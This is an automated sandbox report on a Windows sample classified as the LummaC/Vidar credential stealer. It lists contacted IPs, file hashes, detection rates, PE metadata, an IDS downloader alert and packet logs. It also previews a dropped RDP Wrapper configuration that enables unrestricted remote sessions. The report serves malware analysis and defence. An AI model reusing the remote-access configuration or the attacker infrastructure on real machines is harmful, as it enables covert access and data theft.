                            http://api.ipify.org/ | false | | unknown

                                                IP | Domain | Country | ASN | ASN Name | Malicious
                                                239.255.255.250 | unknown | Reserved | unknown | unknown | false
                                                188.114.97.3 | hansgborn.eu | European Union | 13335 | CLOUDFLARENETUS | false
                                                8.46.123.33 | unknown | United States | 62713 | AS-PUBMATICUS | true
                                                147.45.44.104 | unknown | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | false
                                                104.26.13.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false

                                                Joe Sandbox version: 41.0.0 Charoite
                                                Analysis ID: 1523922
                                                Start date and time: 2024-10-02 08:53:41 +02:00
                                                Joe Sandbox product: CloudBasic
                                                Overall analysis duration: 0h 7m 14s
                                                Hypervisor based Inspection enabled: false
                                                Report type: full
                                                Cookbook file name: default.jbs
                                                Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed: 31
                                                Number of new started drivers analysed: 3
                                                Number of existing processes analysed: 0
                                                Number of existing drivers analysed: 0
                                                Number of injected processes analysed: 0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode: default
                                                Analysis stop reason: Timeout
                                                Sample name: file.exe
                                                Detection: MAL
                                                Classification: mal100.spre.troj.evad.winEXE@30/9@2/5
                                                EGA Information:
                                                • Successful, ratio: 50%
                                                HCA Information:
                                                • Successful, ratio: 99%
                                                • Number of executed functions: 139
                                                • Number of non-executed functions: 49
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target file.exe, PID 7404 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                TimeTypeDescription
                                                02:55:40API Interceptor1x Sleep call for process: file.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Program Files\RDP Wrapper\rdpwrap.dll | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar
 | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar
 | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar
 | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar
 | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar
 | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar
 | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar
 | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar
 | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar
 | smss.exe | malicious | RMSRemoteAdmin, RDPWrap Tool, xRAT
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):116736
                                                                                                            Entropy (8bit):5.884975745255681
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
                                                                                                            MD5:461ADE40B800AE80A40985594E1AC236
                                                                                                            SHA1:B3892EEF846C044A2B0785D54A432B3E93A968C8
                                                                                                            SHA-256:798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                                                                                                            SHA-512:421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 54%
• Antivirus: Virustotal, Detection: 57%
Joe Sandbox View:
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: smss.exe, Detection: malicious
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                                                                            File Type:Generic INItialization configuration [SLPolicy]
                                                                                                            Category:dropped
                                                                                                            Size (bytes):443552
                                                                                                            Entropy (8bit):5.4496544667416975
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:DUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7Y:TJGYS33L+MUIiG4IvREWddadl/Fy/k9c
                                                                                                            MD5:92BC5FEDB559357AA69D516A628F45DC
                                                                                                            SHA1:6468A9FA0271724E70243EAB49D200F457D3D554
                                                                                                            SHA-256:85CD5CD634FA8BBBF8D71B0A7D49A58870EF760DA6D6E7789452CAE4CAB28127
                                                                                                            SHA-512:87E210E22631C1A394918859213140A7C54B75AEC9BBC4F44509959D15CFA14ABCBFEB1ADF9CFFA11B2E88F84A8708F67E842D859E63394B7F6036CE934C3CC9
                                                                                                            Malicious:false
Preview:
; RDP Wrapper Library configuration
; Do not modify without special knowledge
; Edited by sebaxakerhtc

[Main]
Updated=2024-09-25
LogFile=\rdpwrap.txt
SLPolicyHookNT60=1
SLPolicyHookNT61=1

[SLPolicy]
TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1
TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1
TerminalServices-RemoteConnectionManager-AllowAppServerMode=1
TerminalServices-RemoteConnectionManager-AllowMultimon=1
TerminalServices-RemoteConnectionManager-MaxUserSessions=0
TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0
TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2
TerminalServices-RDP-7-Advanced-Compression-Allowed=1
TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0
TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000
TerminalServices-DeviceRedirection-Licenses-TS
                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                            File Type:CSV text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1298
                                                                                                            Entropy (8bit):5.345181606725495
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeBE4D2c/sXE4qdKm:MxHKlYHKh3oPtHo6hAHKzeBHCHHA
                                                                                                            MD5:B602069B69E310409FAD82BFC3CBB818
                                                                                                            SHA1:ED23568805903474D8E77BCE3AD927E5065FFFCD
                                                                                                            SHA-256:979D1AD6AF4CFA4BF6782D5F781BE35F0C7B9FF42B09EE9D3165A3E8F3B80E57
                                                                                                            SHA-512:A5EFDA1DAA3616317054E5F692DF3A7ACA497DFA7BD3B42F056777F0CA3BAF422725C88C47FDC8718CA157CABB15BCCDC26EDAF8A31ECA491FC1C38A8342C43C
                                                                                                            Malicious:true
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.DirectoryServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Di
                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                            Category:modified
                                                                                                            Size (bytes):1785344
                                                                                                            Entropy (8bit):6.646511331349125
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:+rKxoVT2iXc+IZP+6WiaTAsN/3ebTvK+63CWH8iA/iD2hgPjcC8SVdKumYr7:vHZGpdqYH8ia6GcKuR7
                                                                                                            MD5:C213162C86BB943BCDF91B3DF381D2F6
                                                                                                            SHA1:8EC200E2D836354A62F16CDB3EED4BB760165425
                                                                                                            SHA-256:AC91B2A2DB1909A2C166E243391846AD8D9EDE2C6FCFD33B60ACF599E48F9AFC
                                                                                                            SHA-512:B3EAD28BB1F4B87B0C36C129864A8AF34FC11E5E9FEAA047D4CA0525BEC379D07C8EFEE259EDE8832B65B3C03EF4396C9202989249199F7037D56439187F147B
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 68%
                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...#.CZ.................4..........<7.......P....@..............................................@...................................`...{.......................^...................................................................................text... ........................... ..`.itext..|....0... .................. ..`.data...x....P.......8..............@....bss.....O...p.......L...................idata...............L..............@....tls.................`...................rdata...............`..............@..@.reloc...^.......`...b..............@..B.rsrc....{...`...|..................@..@.............p......................@..@................................................................................................
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):37376
                                                                                                            Entropy (8bit):5.7181012847214445
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                                                                                                            MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                                                                                                            SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                                                                                                            SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                                                                                                            SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\SysWOW64\netsh.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):7
                                                                                                            Entropy (8bit):2.2359263506290326
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:t:t
                                                                                                            MD5:F1CA165C0DA831C9A17D08C4DECBD114
                                                                                                            SHA1:D750F8260312A40968458169B496C40DACC751CA
                                                                                                            SHA-256:ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
                                                                                                            SHA-512:052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
                                                                                                            Malicious:false
                                                                                                            Preview:Ok.....
                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):64
                                                                                                            Entropy (8bit):3.650608324205336
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:PUlWRM5I2Y1Ank/tulLn:slWjGEtqLn
                                                                                                            MD5:3C791794E5AEF050D26FCAC2D8CFF99F
                                                                                                            SHA1:BF714C5132F15E04FE871C3A69496AFFDE2ED2D6
                                                                                                            SHA-256:44D608121797BDEF70283EBC36F2F15D2D05A5AA9BC7E3925965A1959FB8D078
                                                                                                            SHA-512:12B6C62176976D5FA2BD1684FCF06E64FF38D8D01F712042F1ECB0112A80B76CCD270A449E878BC7E946D7C29C1EE753E0404A842D0C52761B09D762DB0E1087
                                                                                                            Malicious:false
                                                                                                            Preview:....5.7.1.3.4.5.....\MAILSLOT\NET\GETDCFA437B49.................
                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Entropy (8bit):7.993016539246401
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                            File name:file.exe
                                                                                                            File size:946'176 bytes
                                                                                                            MD5:6ceb22aeb317c27cf8a0944ec9634d40
                                                                                                            SHA1:235d29feea468488b0f1faa70ac2ce1488ea79d7
                                                                                                            SHA256:d2184ec878d89c46f860fa4c37b4d3ebe4803287d894ae8eabf3e1d28ce322da
                                                                                                            SHA512:d6afd2c18743a0b1c818ac787417bbf0b033e336056462035f2372feb31e5060a933dca1e107559eb271f6b9ad5093a738c867c39f80ff15d46b4dd34e3346eb
                                                                                                            SSDEEP:24576:R5WX0rB7uivDX/CYzQ84GpxkFScTC818:7WcB1PHytJuu
                                                                                                            TLSH:4115231B22DC9412FF89ECF327956E045DB4A6E373264761B71C0E3CB795AD18833A68
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..V...........u... ........@.. ....................................`................................
                                                                                                            Icon Hash:00928e8e8686b000
                                                                                                            Entrypoint:0x4e75de
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x880A0FF9 [Tue Apr 29 05:07:05 2042 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                            Instruction
                                                                                                            jmp dword ptr [00402000h]
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xe7588          0x53          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xe8000          0x1417        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xea000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy              Characteristics
.text   0x2000           0xe55e4       0xe5600   91d178edf87e4f285d1f592e0d53f19d  False     0.991000723773842    data       7.995759768210477    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xe8000          0x1417        0x1600    db1a5c6ea8d590647c63bf2ed92718b0  False     0.37340198863636365  data       5.28740838262783     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xea000          0xc           0x200     61197955e04234cb50a2da7263368b5a  False     0.044921875          data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA      Size    Type                                                                               Language  Country  ZLIB Complexity
RT_VERSION   0xe80a0  0x254   data                                                                                                  0.45805369127516776
RT_MANIFEST  0xe82f4  0x1123  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                     0.4043765671301573
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                        SID      Signature                                         Severity  Source IP    Source Port  Dest IP        Dest Port  Protocol
2024-10-02T08:55:38.682625+0200  2803305  ETPRO MALWARE Common Downloader Header Pattern H  3         192.168.2.7  49709        104.26.13.205  80         TCP
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                            Oct 2, 2024 08:54:59.319178104 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.319205999 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.319205999 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.320024014 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.320039988 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.320055008 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.320070982 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.320085049 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.320091963 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.320128918 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.320128918 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.320837021 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.320851088 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.320866108 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.321013927 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.394474030 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.394639969 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.394654989 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.394710064 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.394881010 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.394897938 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.395013094 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.395175934 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.395191908 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.395236969 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.395478010 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.395937920 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.400016069 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.400158882 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.400172949 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.400212049 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.400319099 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.400336027 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.400413990 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.400588989 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.400716066 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.400732040 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.400754929 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.400845051 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.400933027 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.400958061 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.400995970 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.401262045 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.401278019 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.401294947 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.401329041 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.401637077 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.401652098 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.401669979 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.401694059 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.401741028 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.402084112 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.402098894 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.402115107 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.402129889 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.402146101 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.402160883 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.402168989 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.402168989 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.402239084 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.402987957 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.403004885 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.403018951 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.403036118 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.403049946 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.403065920 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.403074026 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.403074026 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.403084993 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.403140068 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.403898954 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.403914928 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.403929949 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.403945923 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.403961897 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.403970957 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.403970957 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.403978109 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.403994083 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.404040098 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.404040098 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.404787064 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.404819965 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.404834032 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.404850006 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.404865980 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.404882908 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.404887915 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.404887915 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.404932976 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.405664921 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.405682087 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.405695915 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.405711889 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.405725956 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.405741930 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.405756950 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.405770063 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.405770063 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.405833006 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.406588078 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.406601906 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.406619072 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.406632900 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.406646967 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.406658888 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.406658888 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.406665087 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.406719923 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.407480955 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.407496929 CEST8049702147.45.44.104192.168.2.7
